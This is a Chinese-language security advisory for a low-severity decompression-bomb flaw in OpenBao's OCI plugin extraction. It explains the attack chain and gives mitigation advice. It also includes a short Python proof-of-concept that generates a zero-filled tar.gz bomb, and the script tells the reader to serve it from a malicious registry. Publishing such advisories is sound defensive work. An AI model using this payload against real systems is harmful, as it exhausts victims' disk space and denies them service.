CVE-2026-39396 CVSS 3.1 低危

CVE-2026-39396 OpenBao 解压缩炸弹导致拒绝服务漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39396

漏洞类型

拒绝服务

CVSS评分

3.1 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

OpenBao

漏洞概述

OpenBao是一款开源的身份感知秘密管理系统。在2.5.3版本之前，其OCI插件下载器中的`ExtractPluginFromImage()`函数存在安全漏洞。该函数在从容器镜像提取插件二进制文件时，使用`io.Copy`流式传输解压后的tar数据，且未对写入字节数设置上限。攻击者若控制或破坏了受害者配置引用的OCI注册表，可提供包含解压缩炸弹的特制镜像，解压后生成任意大的文件。由于完整性检查在文件完全写入后进行，此时磁盘耗尽已发生，导致拒绝服务。

技术细节

该漏洞源于OpenBao处理OCI插件镜像时的逻辑缺陷。具体而言，`ExtractPluginFromImage()`函数负责从容器镜像中提取插件，它通过`io.Copy`将解压流直接写入磁盘。关键问题在于代码未对解压后的数据大小进行限制或配额控制。攻击者可以构造一个恶意的压缩包（解压缩炸弹），其中包含极小的压缩数据（如几KB的gzip文件），但在解压时会膨胀成巨大的文件（如几十GB）。当OpenBao尝试拉取并处理受控注册表中的恶意镜像时，它会消耗大量磁盘空间，导致系统资源耗尽。虽然系统设计了SHA256完整性校验，但该校验步骤位于文件写入完成之后，属于“事后检查”，无法防止写入过程中的资源耗尽攻击。

攻击链分析

STEP 1

侦察与准备

攻击者识别受害者使用的OpenBao实例及其配置的OCI注册表来源。

STEP 2

武器化

攻击者准备一个恶意的容器镜像，其中包含一个特制的压缩包（解压缩炸弹），该压缩包解压后会占用极大的磁盘空间。

STEP 3

投递

攻击者控制或入侵受害者引用的OCI注册表，将合法的插件镜像替换为恶意镜像，或者诱导受害者修改配置指向恶意注册表。

STEP 4

利用

受害者的OpenBao实例尝试下载并提取该插件。`ExtractPluginFromImage()`函数开始解压数据流并无限制地写入磁盘。

STEP 5

影响

磁盘空间被迅速耗尽，导致系统服务不可用（DoS）。虽然后续SHA256校验会失败，但破坏已经造成。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os
import tarfile
import gzip

# PoC Concept: Generate a decompression bomb payload
# This script creates a highly compressible file (zeros) and packs it into a tar.gz.
# When extracted by the vulnerable OpenBao version, it consumes disk space.

def generate_bomb(output_file, uncompressed_size_mb=100):
    """
    Generates a tar.gz file that decompresses to a specified size.
    In a real attack, this would be much larger (GBs).
    """
    # Create a temporary file filled with zeros (highly compressible)
    temp_file = "temp_large_file.bin"
    chunk_size = 1024 * 1024  # 1MB
    
    print(f"Generating {uncompressed_size_mb}MB payload...")
    with open(temp_file, "wb") as f:
        for _ in range(uncompressed_size_mb):
            f.write(b"\x00" * chunk_size)

    # Compress it into a tar.gz stream
    print("Compressing payload...")
    with tarfile.open(output_file, "w:gz") as tar:
        tar.add(temp_file, arcname="plugin_binary")
    
    # Clean up
    os.remove(temp_file)
    print(f"Bomb created: {output_file}")
    print("Serve this file via a malicious OCI registry to exploit CVE-2026-39396.")

if __name__ == "__main__":
    generate_bomb("malicious_plugin.tar.gz", uncompressed_size_mb=100)

影响范围

OpenBao < 2.5.3

防御指南

临时缓解措施

如果无法立即升级，请确保OpenBao配置中引用的所有OCI注册表都是安全的，并且未被未授权方控制。建议监控系统的磁盘使用情况，一旦发现异常的快速占用，应立即终止OpenBao进程并检查插件下载日志。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表